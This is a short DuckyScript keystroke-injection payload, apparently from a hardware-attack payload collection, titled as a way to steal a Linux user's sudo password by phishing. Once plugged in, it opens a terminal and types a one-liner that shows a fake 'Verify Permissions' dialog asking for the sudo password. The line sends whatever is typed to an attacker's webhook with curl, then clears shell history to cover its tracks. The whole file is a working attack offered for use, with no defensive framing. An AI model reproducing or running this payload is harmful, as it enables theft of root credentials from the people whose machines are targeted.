REM ###########################################################
REM #                                                         |
REM # Title        : Exfiltrate Sudo Password By Phising      |
REM # Author       : Zenin                                    |
REM # Version      : 1.0                                      |
REM # Category     : Credentials, Phishing                    |
REM # Target       : Linux                                    |
REM #                                                         |
REM ###########################################################

DELAY 1000
CTRL-ALT t
DELAY 2000

STRING WEBHOOK_URL="URL-WEBHOOK"
ENTER
DELAY 500

STRING $(curl -H "Content-Type: application/json" -X POST -d "{\"content\": \"$(kdialog --title "Verify Permissions" --inputbox "Put your sudo password to continue" --default "password")\"}" $WEBHOOK_URL); history -c; exit;
ENTER
